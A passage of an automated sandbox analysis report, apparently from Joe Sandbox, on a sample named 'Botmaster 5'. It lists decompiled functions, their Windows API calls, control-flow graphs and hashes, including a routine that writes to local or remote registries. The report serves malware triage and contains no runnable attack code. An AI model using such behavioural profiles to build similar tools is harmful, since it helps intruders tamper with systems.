                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 0040FE49
                                                                                                                                                                                                                  • wcslen.MSVCRT ref: 0040FFCF
                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,00000000), ref: 0040FFE1
                                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040FFF4
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: File$Heap$AllocCreate$Read$FreePointerSizememcmpwcscpywcslen
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 2541932026-0
                                                                                                                                                                                                                  • Opcode ID: a1f6299806bc8dd81047a047d4c3069597c76ab883c536fb1f5a628a026c078a
                                                                                                                                                                                                                  • Instruction ID: fb34991ad777bda7f8454352a33fab974fdcf1d2e920a61de72bbf8f2660624d
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a1f6299806bc8dd81047a047d4c3069597c76ab883c536fb1f5a628a026c078a
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7A1DA70804149AFDB315FA8DC94ABA7BB9EB06300F54047BE5C1B26B1D3784D8ADB5E
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00425C9E Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 66libraryloaderCOMMON
                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 3431 425c9e-425cc9 LoadLibraryW 3432 425d13-425d1e LoadLibraryW 3431->3432 3433 425ccb-425cd8 GetProcAddress 3431->3433 3436 425d20-425d2a GetProcAddress 3432->3436 3437 425d4f-425d56 3432->3437 3434 425cda-425cfa memset 3433->3434 3435 425d0c-425d0d FreeLibrary 3433->3435 3434->3435 3441 425cfc-425d09 3434->3441 3435->3432 3438 425d48-425d49 FreeLibrary 3436->3438 3439 425d2c-425d30 3436->3439 3438->3437 3443 425d32-425d39 3439->3443 3444 425d44 3439->3444 3441->3435 3443->3444 3445 425d3b-425d42 3443->3445 3444->3438 3445->3438
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(COMCTL32.DLL,00000000), ref: 00425CBD
                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 00425CD1
                                                                                                                                                                                                                  • memset.MSVCRT ref: 00425CE2
                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00425D0D
                                                                                                                                                                                                                  • LoadLibraryW.KERNELBASE(uxtheme.dll), ref: 00425D18
                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 00425D26
                                                                                                                                                                                                                  • FreeLibrary.KERNELBASE(00000000), ref: 00425D49
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Library$AddressFreeLoadProc$memset
                                                                                                                                                                                                                  • String ID: COMCTL32.DLL$DllGetVersion$IsAppThemed$uxtheme.dll
                                                                                                                                                                                                                  • API String ID: 4277437538-2634860346
                                                                                                                                                                                                                  • Opcode ID: 067626bc9b55c7784240e662f9d519e1aab40e772ac0264a7acb59c6396b11f8
                                                                                                                                                                                                                  • Instruction ID: 4afc3970bd3f821b80d188e7848050363d97004c315cea48727a17688e0ad365
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 067626bc9b55c7784240e662f9d519e1aab40e772ac0264a7acb59c6396b11f8
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55115471E10669ABDF109BE9EC49B9EB7F89F44754F108026E500F6280D7B8D9448BB9
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0042162D Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86memoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 3474 42162d-421639 3475 4216e9-42171d CallWindowProcW GetPropW GetWindowLongW 3474->3475 3476 42163f-421642 3474->3476 3477 42173a 3475->3477 3478 42171f-42172d call 427eaa 3475->3478 3479 4216b2-4216c9 RemovePropW HeapFree 3476->3479 3480 421644-421645 3476->3480 3485 42173c-421740 3477->3485 3478->3477 3489 42172f-421735 call 421331 3478->3489 3481 4216cf-4216e7 CallWindowProcW 3479->3481 3483 421647-421649 3480->3483 3484 421674-421678 3480->3484 3481->3485 3483->3481 3487 42164f-42166f CallWindowProcW call 421514 3483->3487 3484->3481 3488 42167a-421698 CallWindowProcW call 42143e 3484->3488 3487->3477 3494 42169d-42169f 3488->3494 3489->3477 3495 4216a1-4216a6 3494->3495 3496 4216ab-4216ad 3494->3496 3495->3485 3496->3485
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • CallWindowProcW.USER32(?,00000085,?,?), ref: 00421664
                                                                                                                                                                                                                    • Part of subcall function 00421514: GetWindowDC.USER32(?), ref: 00421542
                                                                                                                                                                                                                    • Part of subcall function 00421514: GetWindowRect.USER32(?,?), ref: 00421550
                                                                                                                                                                                                                    • Part of subcall function 00421514: GetPropW.USER32(?,PB_ClientRect), ref: 0042156E
                                                                                                                                                                                                                    • Part of subcall function 00421514: memcpy.MSVCRT ref: 00421580
                                                                                                                                                                                                                    • Part of subcall function 00421514: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 004215B3
                                                                                                                                                                                                                    • Part of subcall function 00421514: IsWindowEnabled.USER32(?), ref: 004215D8
                                                                                                                                                                                                                    • Part of subcall function 00421514: ReleaseDC.USER32(?,?), ref: 00421621
                                                                                                                                                                                                                  • CallWindowProcW.USER32(?,00000083,?,?), ref: 00421690
                                                                                                                                                                                                                  • RemovePropW.USER32(?,PB_ClientRect), ref: 004216BA
                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 004216C9
                                                                                                                                                                                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 004216E1
                                                                                                                                                                                                                  • CallWindowProcW.USER32(?,00000030,?,?), ref: 004216FA
                                                                                                                                                                                                                  • GetPropW.USER32(?,PB_ID), ref: 00421708
                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F4), ref: 00421715
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Window$CallProc$Prop$Rect$ClipEnabledExcludeFreeHeapLongReleaseRemovememcpy
                                                                                                                                                                                                                  • String ID: PB_ClientRect$PB_ID
                                                                                                                                                                                                                  • API String ID: 3045710053-1186144853
                                                                                                                                                                                                                  • Opcode ID: b6ff0e5cbacca881479c548caff3d7354e45a10429aa4efb5432d8e929a0806b
                                                                                                                                                                                                                  • Instruction ID: f4b22154673e098da541672915b56536d38ff0945dc09c5f2ef93a9209185d41
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6ff0e5cbacca881479c548caff3d7354e45a10429aa4efb5432d8e929a0806b
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A218C36210119BFCF116FA4FC48E9A3B6AFF64740F844026F90596170E7B59C60DB5A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0040C1D4 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 191registryCOMMON
                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 4118 40c1d4-40c1d5 4119 40c1da-40c1e5 4118->4119 4119->4119 4120 40c1e7-40c229 call 40a000 * 3 call 40a008 4119->4120 4129 40c22b 4120->4129 4130 40c22d-40c235 4120->4130 4131 40c28f-40c29e call 429a30 4129->4131 4132 40c237 4130->4132 4133 40c239-40c241 4130->4133 4140 40c2a0-40c2b2 call 40a008 4131->4140 4141 40c2b7-40c2c8 call 40c4a4 4131->4141 4132->4131 4135 40c243 4133->4135 4136 40c245-40c24d 4133->4136 4135->4131 4138 40c251-40c259 4136->4138 4139 40c24f 4136->4139 4142 40c25b 4138->4142 4143 40c25d-40c265 4138->4143 4139->4131 4152 40c45c-40c49e call 429a70 * 7 4140->4152 4153 40c2e1-40c354 call 40a008 call 429950 call 4299b0 call 429950 call 4299b0 call 428e40 call 429a30 4141->4153 4154 40c2ca-40c2dc call 40a008 4141->4154 4142->4131 4146 40c267 4143->4146 4147 40c269-40c271 4143->4147 4146->4131 4150 40c273 4147->4150 4151 40c275-40c28a call 40a008 4147->4151 4150->4131 4151->4152 4187 40c356-40c378 call 428b00 call 428c10 call 4299b0 4153->4187 4188 40c37d-40c38c call 429a30 4153->4188 4154->4152 4187->4188 4193 40c3b0-40c3e2 RegConnectRegistryW RegOpenKeyExW 4188->4193 4194 40c38e-40c3ae RegOpenKeyExW 4188->4194 4196 40c3e6-40c3ec 4193->4196 4194->4196 4198 40c43d-40c458 RegCloseKey call 40a008 4196->4198 4199 40c3ee-40c426 call 429250 RegSetValueExW call 40a008 4196->4199 4198->4152 4206 40c42b-40c439 RegCloseKey 4199->4206 4206->4152
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                    • Part of subcall function 00429950: wcslen.MSVCRT ref: 00429963
                                                                                                                                                                                                                    • Part of subcall function 004299B0: RtlAllocateHeap.NTDLL(00990000,00000000,?,?,?,00407074,?,0000004E,00000000,00000000,?,00000000), ref: 004299D6
                                                                                                                                                                                                                    • Part of subcall function 004299B0: HeapReAlloc.KERNEL32(00990000,00000000,00000000,?,?,?,00407074,?,0000004E,00000000,00000000,?,00000000), ref: 004299F9
                                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,000F003F,00000000,00000001,00000000,00000000,?,?,?,?,00000000), ref: 0040C3A5
                                                                                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(00000000,?,?), ref: 0040C3BD
                                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(00000000,?,00000000,000F003F,00000000,00000000,?,?,00000001,00000000,00000000,?,?,?,?,00000000), ref: 0040C3DD
                                                                                                                                                                                                                  • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000001,000F003F,-00000002,00000000,00000000,?,00000000,000F003F,00000000,00000000,?,?,00000001), ref: 0040C414
                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,000F003F,-00000002,00000000,00000000,?,00000000,000F003F,00000000,00000000,?,?), ref: 0040C42F
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  • ERROR, subkeyname is empty, xrefs: 0040C2A0
                                                                                                                                                                                                                  • ERROR, #HKEY is empty, xrefs: 0040C275
                                                                                                                                                                                                                  • ERROR, sub key dont exist, xrefs: 0040C2CA
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: HeapOpen$AllocAllocateCloseConnectRegistryValuewcslen
                                                                                                                                                                                                                  • String ID: ERROR, #HKEY is empty$ERROR, sub key dont exist$ERROR, subkeyname is empty
                                                                                                                                                                                                                  • API String ID: 1228465285-196979880
                                                                                                                                                                                                                  • Opcode ID: 5514d959cf69f775d10939095124b1f6b2dcb264748074a9d7e76ccb49a71b48
                                                                                                                                                                                                                  • Instruction ID: 2b94ce77bffadc17852fd9d3b22516a2b584cba972ade5f651fe69af74992f8e
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5514d959cf69f775d10939095124b1f6b2dcb264748074a9d7e76ccb49a71b48
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 04614E70208301EBC701BB61E8C2A6F77A5EF84308F60893FF585662A1D7799C55DB5B
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00420E0B Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 114registryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • memset.MSVCRT ref: 00420E44
                                                                                                                                                                                                                  • memset.MSVCRT ref: 00420E8A
                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00420EB4
                                                                                                                                                                                                                  • RegisterClassExW.USER32(?), ref: 00420EC8
                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000000,PureContainer,00000000,00000000,?,?,?,?,?,000000FF,00000000,-FFFFFEC7), ref: 00420F30
                                                                                                                                                                                                                  • SetClassLongW.USER32(00000000,000000F6,00000010), ref: 00420F41
                                                                                                                                                                                                                  • SetWindowLongW.USER32(00000000,00000000,00000000), ref: 00420F5E
                                                                                                                                                                                                                  • InvalidateRect.USER32(00000000,00000000,00000001,00000000,?,00000000), ref: 00420F6E
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ClassLongWindowmemset$CreateCursorInvalidateLoadRectRegister
                                                                                                                                                                                                                  • String ID: PureContainer
                                                                                                                                                                                                                  • API String ID: 761371183-2295191815
                                                                                                                                                                                                                  • Opcode ID: f205ec9b66d729240b702f0b69269d860fe6fcf516cf5788b519c20afe5fc025
                                                                                                                                                                                                                  • Instruction ID: 328f6316a278802503a28144f1bf513a1ca6efec74382cf3d36fe741a7c2068b
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f205ec9b66d729240b702f0b69269d860fe6fcf516cf5788b519c20afe5fc025
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1C41C170600228BBCB10AF95ED48A9B7FFCFF45755F00012AF900A22A1E3F94951CB9A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0042346F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 67COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F4), ref: 0042347A
                                                                                                                                                                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 004234A7
                                                                                                                                                                                                                  • RemovePropW.USER32(?,PB_ID), ref: 004234D2
                                                                                                                                                                                                                  • RemovePropW.USER32(?,PB_DropAccept), ref: 004234DA
                                                                                                                                                                                                                  • RevokeDragDrop.OLE32(?), ref: 004234E1
                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000F4,000000FF), ref: 004234EC
                                                                                                                                                                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 00423520
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Window$LongProcPropRemove$CallDragDropRevoke
                                                                                                                                                                                                                  • String ID: PB_DropAccept$PB_ID
                                                                                                                                                                                                                  • API String ID: 2605631428-3688647018
                                                                                                                                                                                                                  • Opcode ID: dfc8583ffc0179372469c6fb46855722b903e166f95b6d5ed30eb3542eefd1c3
                                                                                                                                                                                                                  • Instruction ID: 21b377eb54c46b52a857f2476cd818dec27cbb7e73fcb85eef5e2676ea6b9f6a
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dfc8583ffc0179372469c6fb46855722b903e166f95b6d5ed30eb3542eefd1c3
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F11AF31604125BB8B015F64EC84C6B3B7CFB49775B104226F834621E0DBB99D10DB6A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00426DEF Relevance: 15.2, APIs: 10, Instructions: 188windowCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00426E58
                                                                                                                                                                                                                  • SetDIBits.GDI32(00000000,00000000,00000000,?,?,?,00000000), ref: 00426E7C
                                                                                                                                                                                                                  • DeleteDC.GDI32(?), ref: 00426E85
                                                                                                                                                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 00426E9D
                                                                                                                                                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 00426F24
                                                                                                                                                                                                                  • GetIconInfo.USER32(00000000,?), ref: 00426F41
                                                                                                                                                                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 00426F58
                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00426F6E
                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00426F73
                                                                                                                                                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 00426FA4
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Object$Delete$BitsCompatibleCreateIconInfo
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3731700288-0
                                                                                                                                                                                                                  • Opcode ID: 1fcd9235cb1d319768a2fe936d47534bc4b7bb23b321fc8c26fd1aa4f820f867
                                                                                                                                                                                                                  • Instruction ID: f28d94b9aaadd6aa7a3179a64b0699f0a807d75b49252e40b1f53304741a89f4
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1fcd9235cb1d319768a2fe936d47534bc4b7bb23b321fc8c26fd1aa4f820f867
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5861B531A00229EFDF11DFA5FD40AAEBBB9EF04314F56406AF811A7291EB749D40DB58
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00424841 Relevance: 15.2, APIs: 10, Instructions: 152windowmemoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,00000001), ref: 0042488D
                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,00000001), ref: 00424899
                                                                                                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000003), ref: 004248E2
                                                                                                                                                                                                                  • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,000000FF,000005FF), ref: 00424903
                                                                                                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000003), ref: 00424919
                                                                                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 00424929
                                                                                                                                                                                                                  • GetActiveWindow.USER32 ref: 0042492F
                                                                                                                                                                                                                  • TranslateAcceleratorW.USER32(000000FF,00000000,?), ref: 0042494A
                                                                                                                                                                                                                  • TranslateMessage.USER32(?), ref: 00424969
                                                                                                                                                                                                                  • DispatchMessageW.USER32(?), ref: 00424973
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Message$FreeHeapPeekTranslate$AcceleratorActiveCallbackDispatchDispatcherMultipleObjectsUserWaitWindow
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1841929057-0
                                                                                                                                                                                                                  • Opcode ID: 137067e3954b147197c2852cef3d95f3ef4b2d280938ad449329f2b247cf2dba
                                                                                                                                                                                                                  • Instruction ID: 5bdb1e47ebafb0d2f97a3e2ff72b772ae95e805535ab1f2b36919add93d7bf1b
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 137067e3954b147197c2852cef3d95f3ef4b2d280938ad449329f2b247cf2dba
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A0516DB4A00B10AFC735DF65E884C6BBBF9FFC8710790492EE45682A50D774E841CB69
